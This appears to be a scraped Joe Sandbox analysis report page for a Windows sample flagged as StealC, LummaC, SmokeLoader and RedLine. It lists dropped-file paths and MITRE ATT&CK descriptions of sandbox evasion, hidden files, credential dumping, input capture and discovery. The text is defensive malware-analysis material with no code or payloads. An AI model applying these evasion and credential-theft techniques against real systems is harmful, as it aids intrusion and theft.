Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report uVQLD8YVk6.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: SmokeLoader

Threatname: RedLine

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Privilege Escalation

Bitcoin Miner

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\360\360Safe\deepscan\speedmem2.hg

C:\Program Files (x86)\ClocX\BackupAlarms.bat

C:\Program Files (x86)\ClocX\ClocX.exe

Windows Analysis Report
uVQLD8YVk6.exe

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre